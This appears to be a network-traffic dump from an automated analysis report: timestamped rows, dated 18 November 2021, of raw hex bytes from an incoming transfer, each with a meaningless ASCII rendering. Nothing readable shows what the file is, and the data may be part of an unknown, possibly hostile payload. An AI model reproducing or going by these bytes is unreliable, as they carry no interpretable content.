                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2311INData Raw: 18 3a 4e d0 ea d4 bf 04 b5 53 68 bb e3 16 98 f1 68 84 12 f3 ed 0e ba d0 a0 42 8d 36 85 b5 33 f8 74 e0 53 bb 4b 00 e2 db 7f 81 cb d4 cc fb 4f 1d 07 e7 e4 ee 7f b3 ab 13 b8 fe cf 0d 60 66 68 60 f6 25 5f 38 41 c4 db 7c b2 35 81 6f bd 5e ed 05 04 3f 79 60 78 26 e5 eb e2 0a e5 eb f3 f9 d2 ee 8a ef 97 be ca 9c 97 b2 b3 93 eb 60 c8 68 39 8d fc 22 aa cd 7f c5 a2 61 e9 1c fb 20 16 89 77 c6 4f 73 83 a5 01 17 0e 54 f5 91 b8 8b bf 30 40 e5 02 7e 6c d2 69 12 a7 7c d2 00 41 8c 9e d9 04 c1 5f 94 e2 18 10 17 76 18 37 66 3c 6e 63 27 90 c9 53 5a 2d 7f 98 98 b6 50 d6 54 07 9c 77 4e 11 75 dd 09 3a 48 1a f6 87 07 e5 e6 af 71 22 20 00 f9 58 7a 86 63 0a 3d cf 0c 0b ec 74 14 28 2e 18 b3 45 55 9a 5b 3b 07 6b 60 1b 21 33 2b e8 e4 cb 73 09 f5 40 32 ed 56 56 ee 16 b0 be 24 ba ea 38
                                                                                                                                                                                                  Data Ascii: :NShhB63tSKO`fh`%_8A|5o^?y`x&`h9"a wOsT0@~li|A_v7f<nc'SZ-PTwNu:Hq" Xzc=t(.EU[;k`!3+s@2VV$8
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2327INData Raw: ad d0 96 fe 16 0e 0d e5 fb 32 be bd 7f e1 37 56 41 73 bb 9d e4 15 8d a1 09 b1 3a f3 4b 86 e8 80 10 05 77 01 da 2b 51 ae 20 62 4f cb 02 a8 c0 c8 80 95 c6 32 05 82 a1 08 07 22 0c 51 4e 74 0b a9 09 3b 38 44 a2 13 18 08 8e d1 d4 94 a1 bd d6 2b db 26 36 e0 3f a0 27 9e a5 51 a8 af f5 85 1a 1a bc 4d 12 bd e6 f7 5a c6 4b 7f 44 05 d9 10 08 b0 ca 07 0f a9 e0 92 37 be 7a f8 00 20 3e 0b f4 da fe 0a f6 50 63 99 e8 95 e0 89 54 7e 09 27 34 70 dc f5 52 53 27 f7 4d 47 26 8b de 20 7c b8 de 15 95 db fd 1e ac 20 5b 64 ba 6e 26 3f 08 cb 2b 0a 4f 70 e0 4b 51 7e 42 13 10 26 fb 13 0b 68 bd 42 b3 92 be 28 00 8d 7d 61 75 a0 bd 03 ab 91 18 08 1e 4c 4c 10 19 f5 22 e4 1a 9a 99 1a 57 5e 8a 2d 57 06 e0 78 19 00 6e 0d ed f5 9e 1a e4 98 f5 6c 50 a0 1e 7b fe b5 74 96 60 17 e7 93 f4 b5 45
                                                                                                                                                                                                  Data Ascii: 27VAs:Kw+Q bO2"QNt;8D+&6?'QMZKD7z >PcT~'4pRS'MG& | [dn&?+OpKQ~B&hB(}auLL"W^-WxnlP{t`E
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2343INData Raw: 10 8f 62 f0 2d a9 d0 38 05 a6 47 91 07 1f bb ce 76 26 f6 be 81 f5 01 e0 2b 80 3c 64 87 0a 8a e0 72 fb 5a e8 4f 8c 4f 7c fc 80 44 71 15 a5 04 96 2c cf 71 13 2c 39 41 ea 63 8d 43 52 3b 28 b1 51 40 01 ba f4 85 27 1d 02 d9 f8 50 48 72 81 9f 72 52 c8 7a 64 a0 fa 0a 08 42 1e 9c 3b 6f a3 44 ee af b4 34 fb e7 4c 86 cf a3 14 29 fe f7 90 12 16 af 0a ff 1f 84 18 e9 70 48 97 4a 3c c0 b8 0d e7 42 99 d8 64 1d 32 d3 ff e2 92 55 cf 14 88 f8 fd 00 d8 b8 bb ec 27 cc 08 bc 5d a4 2b 4b 75 98 9c 62 af 5b ff fb 74 3a 94 d0 d0 3c 34 63 e4 4f b1 e4 76 a6 42 74 00 ba 8a 04 57 4c 32 be 06 8b 49 a0 ee ce 54 09 40 1f 37 1c 00 61 9e e1 54 a8 5a 3b fe 62 f5 31 02 a7 da f1 7c eb d7 2b ae 6d 7c 65 25 6c 1e 86 48 c6 f4 8a 14 ce 27 d4 56 e9 c7 aa a5 65 8c 81 68 46 5f 9d 40 2e 12 05 fa 2e
                                                                                                                                                                                                  Data Ascii: b-8Gv&+<drZOO|Dq,q,9AcCR;(Q@'PHrrRzdB;oD4L)pHJ<Bd2U']+Kub[t:<4cOvBtWL2IT@7aTZ;b1|+m|e%lH'VehF_@..
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2359INData Raw: 0f 84 96 5f 9f a0 89 19 bf 8c ee 16 18 20 c7 cd 12 8c e6 fb a8 07 e2 0f 5d 0b 99 ff 6d 8a 42 c0 9e b4 1e 2d e8 3b d6 06 62 3e 9b 4b 52 78 22 17 40 db fa ee 84 98 aa 28 8b 4e 40 35 0c 01 e4 7a e3 71 2a 6b 92 2e fb 78 92 8c b4 54 18 d2 09 2e 96 4b 70 a1 2d f4 32 b2 d4 19 12 00 be 6d 51 fd 07 e5 d1 50 72 fa 63 69 52 20 7d db 86 04 e0 d5 ff 4b 72 65 70 08 73 22 13 28 17 c8 e1 34 72 ac c9 cc 64 4e 91 bc 09 b8 c6 57 b8 b8 16 19 2c 58 61 ac 40 6d 11 cb 42 09 05 e5 0a 8e 7b 3c 88 d6 bc 09 46 7e d9 10 89 96 45 54 54 e3 ae ab 5b 14 b8 b2 d6 ed 48 27 a5 14 b6 f6 c7 91 7c 08 f6 c6 26 ae 0c cc d6 5a a7 02 5d 67 06 f2 23 64 a2 76 72 76 60 36 f6 fe e3 60 0c 62 25 0d 2d df cf 88 39 24 92 c2 44 45 a1 52 7a f7 1a 1c 16 b8 22 17 56 e9 14 c3 ca 5e b2 ec 48 1e 87 82 09 d8 81
                                                                                                                                                                                                  Data Ascii: _ ]mB-;b>KRx"@(N@5zq*k.xT.Kp-2mQPrciR }Kreps"(4rdNW,Xa@mB{<F~ETT[H'|&Z]g#dvrv`6`b%-9$DERz"V^H
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2375INData Raw: 86 72 54 00 33 32 40 bc e2 2d bf 21 bf 72 da 33 e1 f7 24 29 b0 55 38 b6 5b 24 9f b6 12 bb 74 ff 3c 96 7d e1 08 c3 5f 2b 9b 40 27 96 50 9f bd a9 40 71 10 e1 44 85 01 0d 7f 8f c6 1a 30 83 98 ff 20 c6 04 1b 54 ac 01 d1 a9 57 c0 87 70 ae d4 fe a7 4e ff fa dc 28 55 5a 7b be 40 e6 f4 51 fd 0b a5 e0 90 09 b5 3a b0 a3 81 66 1f 2e 19 6e 70 74 e1 87 1b 81 01 6c 0c 19 83 3a 10 59 7a f1 a6 2b bd 1d 89 3b 7c 3a 19 54 21 2b 8c 11 2a 17 88 7e 18 49 41 9c dc 78 86 80 81 c0 5a 0c c4 cf e4 ca 52 5a 72 45 1a 9a d8 ad f4 13 3d b5 f8 93 08 4b c2 55 a7 06 7a a0 11 9f fc 29 20 be 08 af 84 ce e5 3b 0f 13 0f 85 02 e1 d2 ff a2 5b 8b 87 fe 3d 43 54 78 3b ac c9 12 18 68 5f 8d 17 31 f0 9c c4 a0 88 a4 73 62 cb 78 0e 3d 07 f7 b0 7a 2b d6 0f a0 64 ca a3 f7 2e da c4 38 1a 70 86 1c a7 83
                                                                                                                                                                                                  Data Ascii: rT32@-!r3$)U8[$t<}_+@'P@qD0 TWpN(UZ{@Q:f.nptl:Yz+;|:T!+*~IAxZRZrE=KUz) ;[=CTx;h_1sbx=z+d.8p
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2391INData Raw: 02 5e 03 51 28 41 23 f5 6a db 53 81 d3 55 c0 db 8c cc 76 78 7e 8d 06 9e 2a 5b 0a e3 1e 28 4a 7b 86 2d 59 17 38 95 32 80 a0 b8 de 11 0a 08 18 84 49 4e 3d 4d 1d 10 67 b2 40 f2 f6 13 38 f7 b3 90 75 ed 2d c6 01 ac aa 36 b6 fc 05 bb 00 ba e8 fb bf 80 59 eb 4f 08 77 31 57 01 77 9d 0d e4 46 b9 65 fe 91 66 f8 7f 06 45 85 71 9e 44 09 9d 11 39 f0 d5 cc a1 c4 94 af f8 fe 42 51 cf b8 fc 66 ca 30 49 61 b0 a1 0b 5b 65 87 18 a7 d0 73 f6 11 4b 65 be 20 f1 b0 21 e9 2d dc 8a f8 ef 45 9d 31 27 f9 eb 8c 14 7b 5b 3c d0 94 f5 51 82 0c 60 5b 80 4b b7 73 7e d9 81 e1 7f 03 6c 85 8b 28 29 ac 12 2e 74 0d 78 c5 39 97 66 6b 38 f3 67 4b aa 8c e5 fb 17 5a 29 9e ab ca 4d 62 68 dc 85 00 e6 11 a4 1c 93 a4 25 55 1c a3 f5 38 bf 0b 55 02 fa 20 2f 01 b1 9a 1b 97 02 30 e6 31 57 11 05 14 6a 04
                                                                                                                                                                                                  Data Ascii: ^Q(A#jSUvx~*[(J{-Y82IN=Mg@8u-6YOw1WwFefEqD9BQf0Ia[esKe !-E1'{[<Q`[Ks~l().tx9fk8gKZ)Mbh%U8U /01Wj
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2407INData Raw: 0b a7 2d 99 f8 d2 de 5f ca e0 ac ea 5e e4 d0 b6 62 dc 13 a3 90 10 a6 a6 5b 4b ab d1 de d6 59 c1 89 01 b3 ab 80 1e 02 08 69 12 60 3b c1 5c da 5c 41 9b 20 04 d6 54 82 ec 18 0e 72 2a 9c 52 33 b9 db 89 f2 ff 44 af b5 71 79 69 7f 8b c5 77 6e 0a 97 f9 c8 cf 3d 10 c7 0b 31 fc 37 d5 e5 71 e7 3c 4b d5 4e 8b 9c 8c 25 fd e7 fa c9 1c bc 95 59 0d 52 55 5b 5c e9 fc b7 7a 5f 7e 14 f2 4c 88 b9 09 bf 93 f1 5e 7d 8c 76 2d 30 53 cb ba fd a8 00 bf 3d 81 f2 49 bc fb 6d 77 42 06 e2 ac fc 35 7e 0c 3b 4f 5a b7 1f 26 02 10 04 ff e3 8f dc af 8b 52 09 2f 79 f1 e0 71 28 8a 4c 10 19 c3 cd 8c fc c0 84 18 f6 4c 1e 05 05 53 c5 fb e5 ee a7 e8 84 59 d7 f4 9d bc b7 e0 8b e6 11 26 cc d4 21 c9 7d 58 87 34 b9 a5 44 be ad 87 84 85 78 80 ad ef 81 72 0b 69 6a 9b 7e 80 81 3e 83 e6 74 61 57 98 29
                                                                                                                                                                                                  Data Ascii: -_^b[KYi`;\\A Tr*R3Dqyiwn=17q<KN%YRU[\z_~L^}v-0S=ImwB5~;OZ&R/yq(LLSY&!}X4Dxrij~>taW)
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2423INData Raw: 62 5f a4 bb 28 12 e5 00 99 c7 d3 10 b2 72 5e 50 04 a1 86 f1 60 21 c8 b8 28 95 70 6e 0b 07 e5 de 61 f5 68 be 49 c2 f1 04 ac c4 b2 8d 18 a4 81 a0 5a 1a 9e 90 a4 12 36 a5 b2 12 ad a8 e6 27 ac 60 e6 24 0c a9 aa 05 04 aa cc 92 90 25 b7 6a 83 8a db df 1a 28 8c 67 ac 85 64 8f bf e4 e5 2a 42 50 6f 28 09 25 21 f4 a3 b8 f0 2f 5c 6e 88 d9 ff b1 b0 c0 7a b9 28 b1 c2 10 63 a3 80 b0 28 01 3b f0 c3 97 c6 50 e9 ae 78 bf d4 78 37 c8 62 f6 98 20 38 a1 ec f4 91 80 c2 e6 2b f5 f1 ae 42 14 fc f7 f9 76 68 e0 a5 7f 06 92 11 7d bd e8 9e 19 c7 b0 d4 0c 9f db ab f5 34 96 58 d5 ff 9e 86 cd 1b d7 5c 36 f0 5e 94 5c 13 31 19 47 ec a8 86 a9 46 7c 34 18 0d 80 0d 30 1a 11 88 40 2e 80 1e e6 89 94 3d f5 7b ae 13 9c f0 5a 5a 12 7e 1e 39 b3 5c 00 c5 4a 0e b9 d1 74 67 62 8f a8 12 3e 0e c2 03
                                                                                                                                                                                                  Data Ascii: b_(r^P`!(pnahIZ6'`$%j(gd*BPo(%!/\nz(c(;Pxx7b 8+Bvh}4X\6^\1GF|40@.={ZZ~9\Jtgb>
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2439INData Raw: 41 66 20 95 4e 4d bc 53 04 45 60 98 fc 02 52 a3 b3 11 67 3f f0 b5 b7 fb ac 08 79 17 e6 e8 09 02 db 33 e5 77 fe 77 c7 45 3a 25 78 cb 5b eb 37 2e 14 d7 df 81 ce f7 61 31 c3 4b 90 78 be 9b 42 a7 e6 7d 11 e0 a5 74 af 82 27 ef 49 79 ad a7 5d bc 39 54 de ae 5a 2f dc 9d 51 44 27 00 03 58 b9 71 5e b5 fc ee 54 b4 7a 52 df a1 15 68 83 ac 2e 99 57 d6 dd 53 be e9 75 d1 87 e0 68 4f 02 c3 5f 56 f2 31 4e 01 e4 6f 9c 5e 7f 3f fd d8 e5 bb 8b 43 5c 00 a8 51 07 b9 d2 2f f7 47 27 d1 e0 f1 29 d0 08 5e b8 fc e6 4a bb 9b 75 4a fd 39 4e b2 e3 f4 d5 73 fe b6 d8 b1 b8 22 60 8d 31 95 14 b6 43 fa 12 9b 53 0b b5 1f d5 94 58 5e e3 bc a4 a5 e2 36 cf cb d0 86 1b 2f 50 26 c7 2c e5 70 28 64 84 5b 55 f8 72 04 77 b6 4c b9 82 cc 04 d4 b8 09 2e 05 00 bd 72 65 02 b6 b5 56 f0 71 26 a6 29 ee 0b
                                                                                                                                                                                                  Data Ascii: Af NMSE`Rg?y3wwE:%x[7.a1KxB}t'Iy]9TZ/QD'Xq^TzRh.WSuhO_V1No^?C\Q/G')^JuJ9Ns"`1CSX^6/P&,p(d[UrwL.reVq&)
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2455INData Raw: 4e c9 e3 69 9e c8 4a 33 80 49 b9 bb ae 94 30 0c 5b a2 84 b3 1e b2 6d 05 14 1e 94 80 34 c9 c4 71 eb 12 18 45 06 d1 f8 22 b8 d8 73 01 16 e7 f5 40 91 ac fc 79 30 94 e6 19 e4 e5 32 31 d5 ec a2 b6 13 5e 01 a5 ec 29 b2 0c f4 e0 47 87 38 2f 58 53 2a b6 7a fa 12 3b e0 5b e8 15 89 84 42 ae 15 bc 09 86 90 a9 1c d7 46 24 44 bd 3d 5a d5 90 4f 41 ef e4 09 34 05 f9 20 20 86 5d 95 14 62 09 43 fd e0 1a c6 f4 30 32 cb f0 09 e5 5f a5 f6 90 ba c6 2c 5b 50 0e 5f 3e d3 df 00 ac 81 13 0a 35 31 c1 11 8c 04 a5 04 ba fc 15 2d 18 40 95 1a 09 c0 18 0a 12 3c 50 08 25 77 04 23 f1 51 e1 cf c4 66 c8 3c 5c 25 70 1c 75 c6 e0 20 f3 a1 5e ba 05 11 36 a3 07 df e5 af 09 b9 58 09 78 4d 2f e6 24 36 30 12 ae 86 8c 98 16 d1 f0 d6 a0 12 5a 4e a7 0b a7 50 d7 a9 5b d7 cd 4e 25 cf f7 b0 08 51 68 0a
                                                                                                                                                                                                  Data Ascii: NiJ3I0[m4qE"s@y021^)G8/XS*z;[BF$D=ZOA4 ]bC02_,[P_>51-@<P%w#Qf<\%pu ^6XxM/$60ZNP[N%Qh
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2471INData Raw: 37 2d 80 61 95 af cf f0 c2 94 25 70 0a d7 e8 e5 1b ae 7c e7 2e 20 d2 88 92 be fd 6a 00 69 43 6c f3 95 aa c8 60 c1 18 52 ed a9 ab b7 51 b8 85 6c d1 04 bf 98 35 ff 4e fc d0 14 6b 1c d8 40 9a e1 22 04 01 94 08 ac 33 ad bc c4 b9 8c 72 f5 65 28 6b 79 65 07 2e ca 3c 08 6f 76 07 0d 7d 0a e4 3a 74 ff 2a 9f 7c 99 94 72 5d 5e 5c 56 4e 52 ec 73 e5 9a 6a d3 ec 6c 83 20 ef b6 cd c7 cd 0e 42 65 1f f7 d5 e0 24 dc e1 09 2c bb 01 cd 5d 67 2c e9 a9 9b 5d 4e 5f 97 7f 14 82 b7 3a 27 57 7b 02 ec 5f e9 e2 90 b8 84 2d 94 b0 5d 94 75 2f 8f 8d fd 94 5d 91 f5 c4 1d bb e6 46 c4 a2 c1 68 05 ad 1e 89 5f da 69 30 16 a5 b2 60 be 05 c1 0f 8f b5 fd c9 c8 42 09 6a ce 5f 71 d1 04 5e d7 ff 44 dd 31 ef 9f f8 15 1a c7 46 a1 0e a4 4e 64 16 b2 b8 78 95 b4 40 e7 d8 fe 3d 61 a9 68 25 fb f6 7e c4
                                                                                                                                                                                                  Data Ascii: 7-a%p|. jiCl`RQl5Nk@"3re(kye.<ov}:t*|r]^\VNRsjl Be$,]g,]N_:'W{_-]u/]Fh_i0`Bj_q^D1FNdx@=ah%~
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2487INData Raw: 6a 57 4f 9b 6a 16 c3 d7 ef ca 82 84 05 52 98 c2 41 9f 87 0c 26 50 6e a9 cc c0 25 c1 b5 5f 67 56 1a 51 30 d5 73 2d 68 64 f4 10 15 26 fe ac 70 e0 ff 86 30 32 8a 38 e9 a9 05 12 1c f6 74 ae e3 58 04 3a 1f d8 4f 4b 52 75 4d 1d ab 0d 25 51 22 c2 22 39 1e 60 56 5e be 2f 98 66 84 4e 5a cd 64 3a bf 69 2f d9 ea 7b b7 87 93 bb 2b bd 27 55 1a 21 7d 62 f1 f8 10 bd 9e fa 92 02 96 3e 72 ff 67 a9 4a 85 af d7 34 14 94 fa 52 fd cd 13 01 68 b3 1a ed 5f 2b 17 20 e2 22 a4 fb 38 7d 81 40 5d 37 58 c6 16 8f 25 6f b2 83 1e 59 0d c2 fc 74 d6 00 d1 10 c7 42 09 a5 2f 3c c6 66 76 23 9b 0b 2f e1 c6 e0 6d a4 08 4b f9 3e 61 71 53 fe 2a ca 5e 90 0a 2c 95 e8 60 ef 7c f7 ff 9f f1 f0 8b 5a 02 11 f2 27 2e 84 98 fb dc 90 1a 21 bf 01 84 7d b9 fc eb 28 7c 9c 42 fd 4a a8 fc f1 b1 27 c2 1a f7 f9
                                                                                                                                                                                                  Data Ascii: jWOjRA&Pn%_gVQ0s-hd&p028tX:OKRuM%Q""9`V^/fNZd:i/{+'U!}b>rgJ4Rh_+ "8}@]7X%oYtB/<fv#/mK>aqS*^,`|Z'.!}(|BJ'
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2503INData Raw: 31 d8 df 76 42 5a da d7 4e b7 7c 88 29 c9 5f 9a 14 02 cd 71 17 5e c7 5c 4b 57 ee ce 20 93 af 9a c1 da cb f4 8e 59 d3 04 fc 1d f4 24 5a bf 12 32 be 2a f9 7b 24 b1 f1 cc 89 6d 75 df c3 da e0 c1 5e 98 17 31 fc 26 46 7a be 9c 28 42 65 00 a3 03 41 bb 78 f7 ac ed 6a 87 90 75 eb fa 31 57 73 d2 22 fe 1c aa ae 2d ff 36 92 2c a0 eb 40 f0 37 fc 8d 1f 39 63 c2 1e 14 00 9c 2d ab b4 02 60 46 d6 90 86 03 5f fe a0 ad 47 cb af 57 95 53 a7 77 1a ed f7 7a 59 10 ce 2b 3f c4 5e 52 eb c3 e4 bb e2 31 5f fc 80 d2 f4 4e 25 e6 bd a8 5f 95 4c 27 2d 0f df 10 95 d0 63 27 cf 12 7c f4 de 97 d5 97 72 27 56 ab dc 95 57 b4 50 09 8a f0 7f 7b dc 55 13 45 00 05 5c 8e bf 75 f7 07 db 81 f3 6c 60 75 e5 e8 7d 40 a0 19 12 f2 ea 71 ae 12 bb fe e5 67 2f fe 29 aa 14 cc ec cd 00 9b 8b bf 3f 05 69 74
                                                                                                                                                                                                  Data Ascii: 1vBZN|)_q^\KW Y$Z2*{$mu^1&Fz(BeAxju1Ws"-6,@79c-`F_GWSwzY+?^R1_N%_L'-c'|r'VWP{UE\ul`u}@qg/)?it
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2519INData Raw: a5 33 40 82 c8 0f 01 23 36 a7 17 14 cb 87 66 76 50 5a 0c c0 b2 cd b3 32 52 c5 d8 a1 9b 01 9d 30 39 27 65 a0 6b df 64 79 21 77 5e 08 7c d7 cb de 74 f8 3a 46 62 fe 3d 41 67 0b df 4c e1 32 0e e9 18 12 a2 ce bf 11 09 52 50 9d 7a fa 31 c9 27 18 3a e7 5e 78 10 20 a4 2f 8f 74 2f 60 a1 b6 49 b1 32 3d 6f 19 1d 81 b5 e1 55 b7 e5 f1 80 0c a2 f3 13 52 5a 02 70 09 15 e9 54 e8 90 04 bc 4d 42 d9 88 e8 71 4c c9 20 81 57 f1 3a a9 d4 ed 6d 27 e6 fe 51 14 40 3f ac 17 cf 71 d3 24 16 2e 18 09 40 b9 07 26 e8 00 f5 97 da b2 b9 28 09 56 b5 99 cc 04 2d c8 04 61 a6 d8 eb 04 93 53 16 05 28 7c a4 ae b2 b1 9f cb a6 fe 57 46 ed 05 02 5b 12 01 82 e8 7f 3b 0b 5b fb 01 3d 43 9f 93 80 cf fc ab 73 04 b1 84 21 d3 e9 c2 d5 ed 12 09 62 34 30 2c c9 ec 84 11 0e 58 fe 12 d1 2d 21 72 d6 eb 88 14
                                                                                                                                                                                                  Data Ascii: 3@#6fvPZ2R09'ekdy!w^|t:Fb=AgL2RPz1':^x /t/`I2=oURZpTMBqL W:m'Q@?q$.@&(V-aS(|WF[;[=Cs!b40,X-!r
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2535INData Raw: 56 2c fe 27 54 5a 5d 35 ec 81 68 34 d3 50 46 45 45 c0 08 66 4a fc 12 7b c1 ef 0e 94 e7 6e 81 cd 5c 19 71 08 2e a7 a6 d0 62 4e cf 53 c2 e9 64 3a 40 44 0f 8b e4 02 48 3e 49 17 db ec ab 35 bd 80 4c 1c 8a 85 95 60 4b 93 0e 9f d9 0c e1 e8 6d fe 0c 10 b5 73 13 08 ed e6 17 76 e0 54 07 7a 63 5a af be 79 09 21 6a a7 58 e6 07 03 a2 d8 5a 36 8e ab 02 28 7b c6 e5 f2 fd d6 93 70 c1 4e e1 6a b9 7b ac ad 23 1e fe 62 b7 9a 00 2c f3 1b 46 c0 dc d1 51 c6 81 15 bf 80 71 e1 20 5e 5a 63 93 1e dd fc af 37 19 48 00 f1 4c 6d 03 4e a3 01 9a 56 5e 7c c6 2f 92 6f 4b 50 3e 54 92 02 e7 58 45 88 77 a0 88 b2 cb 52 fd 27 0b a7 77 ef d8 17 8c a0 d8 3e 94 7a 51 1b 0c 44 68 45 14 cc 54 20 b4 70 95 e7 14 92 6c 81 d5 f8 20 83 71 57 2b f6 4c fe d9 05 ad e2 8d 82 c6 ec 60 b0 f1 91 34 9f d9 f4
                                                                                                                                                                                                  Data Ascii: V,'TZ]5h4PFEEfJ{n\q.bNSd:@DH>I5L`KmsvTzcZy!jXZ6({pNj{#b,FQq ^Zc7HLmNV^|/oKP>TXEwR'w>zQDhET pl qW+L`4
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2551INData Raw: e0 e0 4b 1d 73 c1 48 72 65 f6 b5 ff 81 e1 33 24 f8 ce 49 07 3a 01 a9 61 15 72 5a 7e 22 98 01 08 cb 03 f3 ea e4 40 b0 62 22 a2 18 e1 23 e7 54 11 40 c7 64 58 b2 89 d7 e6 20 25 39 45 7d 29 e8 d0 92 27 38 b2 79 14 67 e2 a8 c2 27 bf 00 b7 62 95 43 80 47 45 62 35 19 9b 53 47 b6 9f 76 eb f0 78 84 69 42 fe b0 58 32 9c 97 40 33 a5 90 1d d7 eb 61 28 e1 0d 27 40 6f 23 50 c0 bd cd 1d 54 98 79 32 1e 7b e4 b9 2e 20 69 e1 c6 28 11 28 d6 52 0a 38 ad dc 7a 6e 0e 6a 21 40 e6 ba 20 4a 5e 13 5e 45 78 32 15 53 53 7c 82 70 eb fd 36 35 2c 6b 2c ec d8 c0 73 61 c3 bd 08 0c 15 bc ae 6a a5 2b 0e e9 44 59 16 44 49 4e c8 b0 50 05 a4 11 9c f7 25 ee 8c e7 85 3a 09 f5 25 ca 11 47 ae 5c 8e b6 88 85 d6 94 70 2d dd 9c 60 9f 5e 90 50 bc 01 e1 19 2f ad 51 1d 22 ac d8 16 2d 68 cb 2f 05 3f 74
                                                                                                                                                                                                  Data Ascii: KsHre3$I:arZ~"@b"#T@dX %9E})'8yg'bCGEb5SGvxiBX2@3a('@o#PTy2{. i((R8znj!@ J^^Ex2SS|p65,k,saj+DYDINP%:%G\p-`^P/Q"-h/?t
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2567INData Raw: f5 7f c1 30 e5 02 ba e0 d1 d6 5b ff f1 24 2b ba 79 90 2a bc d7 a2 b6 40 f1 f7 d8 1c 35 f8 49 12 c0 fa f3 8d e5 ba 34 17 fa ed c3 b5 bf e6 f5 d3 eb cb 98 06 ae 58 7e 7d de 0e 90 a2 db 7b c1 e9 30 ed f9 47 e1 c0 f6 f1 9f 66 9f 74 aa 58 f7 3f 80 90 23 9f f3 7d 60 75 01 97 91 08 10 ba d3 0b c9 8f 95 67 64 0f e2 38 e5 5f 20 1a 01 18 7d a6 80 a9 23 60 fa 31 5d 12 14 4a 1f f3 cc 89 3e 43 10 3d b6 5a ab 22 aa bf dd 0d e2 90 c9 98 da 77 cc 3f 27 76 25 43 08 80 e8 8b 2a 4a d1 4e a4 3d f8 1c 6a cc b0 fe 01 5e 9b de f6 60 6b fc 2b bb 70 b4 ce 8e fa 89 08 10 01 a7 aa 78 9d 2f 75 71 75 98 ca 17 82 84 02 67 02 55 44 e3 0f 90 90 ac 4d 27 73 90 e8 e4 7c ae a1 e1 34 f0 6a f3 c0 84 38 47 1a 63 fa bd 74 b0 e1 01 5f fe f2 04 c9 42 0f e7 04 5f b1 c8 87 2f c0 dc c9 3c f8 9f e1
                                                                                                                                                                                                  Data Ascii: 0[$+y*@5I4X~}{0GftX?#}`ugd8_ }#`1]J>C=Z"w?'v%C*JN=j^`k+px/uqugUDM's|4j8Gct_B_/<
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2583INData Raw: 2a f4 da 7a 77 9c dc 4e 50 fd b7 b0 f6 cc fd 1b 5b c1 ee 42 98 cb dc bf 12 05 01 f3 a2 cf 97 a7 43 0b 60 20 f7 dc 8c 27 5f c5 cc c2 e9 b2 55 a0 7d 68 70 ab 55 4f 0f bb 29 26 2b ea 79 53 3e 90 e6 51 72 81 e7 7a ca ff d6 e2 24 cc 57 cf ae 77 f3 5e 59 db 5b 7b 44 fe 37 26 9b 02 64 6c 45 12 12 d2 da 27 bc 0a d3 ef 8b c9 2d 56 48 91 b9 6b 4a 23 be 8f 36 00 56 50 b8 81 1f 7e 6b b4 08 db 5b 77 9e a5 4a fc cb a5 53 53 2f a9 27 51 7d 4d dd 49 7f d1 ff 72 75 d1 cd d2 d6 70 da 96 df 9d 90 0f 62 8f 13 ef ff 8c ec ca a2 d6 19 52 7f 82 98 0f e6 d3 2f 71 9a 76 b0 26 7c 6b a5 c5 e4 72 28 2e 18 6a c3 bc 53 9c 75 60 ba 4b 00 08 18 db 8a 8c d7 f5 ff 4a 93 02 5f af a7 01 75 7c 93 e3 92 66 84 31 8d 7b 7f 5c d5 01 9f 24 d7 0c fd 80 24 76 3b 9a 06 de 2d cf 10 4a c9 ca 7f 80 8e
                                                                                                                                                                                                  Data Ascii: *zwNP[BC` '_U}hpUO)&+yS>Qrz$Ww^Y[{D7&dlE'-VHkJ#6VP~k[wJSS/'Q}MIrupbR/qv&|kr(.jSu`KJ_u|f1{\$$v;-J
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC2599INData Raw: 12 42 f8 bb b5 5e 30 02 21 91 fb 64 59 82 82 2e 4f 57 9b 03 a8 23 84 4f b5 64 7a e1 aa ec a3 c7 19 11 92 17 1b 82 09 35 0b 75 a1 c0 d8 a9 4f 08 b1 80 46 0b 84 44 6c 96 b0 c5 25 4f 88 42 ac 40 58 e2 b7 b5 ac 25 8c 9e 60 cc 10 f5 01 af 94 9d 46 00 20 e8 24 c4 28 26 bf 16 aa 17 d4 e0 f1 d1 25 f6 84 80 3a 16 a1 f1 23 09 6a 80 74 d2 f1 06 64 59 c4 f7 ab 28 ac c1 5e df f4 e8 1f 51 dd ea 7e bc 25 e1 8e 88 c2 75 fe 7d d6 23 d1 c5 c2 5e 39 0c f0 ae 4a 46 d3 ac 91 09 f1 d3 f6 53 c3 7a b8 a1 ea 4a 1a 46 f2 b9 4a 5f 65 4e 0e 78 5f 11 22 34 31 ed 18 60 1b 36 00 75 01 c3 29 69 49 bc 92 20 45 99 31 7b 00 86 57 4d 25 64 03 b6 dc 25 66 cc 25 61 de d4 ce 88 5f a4 40 7c 22 d1 4d 97 6e 26 7f f4 c0 14 46 7e d2 17 41 63 d1 90 b1 11 4c 6c 40 11 df 51 84 d4 39 00 80 67 e1 c9 2c
                                                                                                                                                                                                  Data Ascii: B^0!dY.OW#Odz5uOFDl%OB@X%`F $(&%:#jtdY(^Q~%u}#^9JFSzJFJ_eNx_"41`6u)iI E1{WM%d%f%a_@|"Mn&F~AcLl@Q9g,
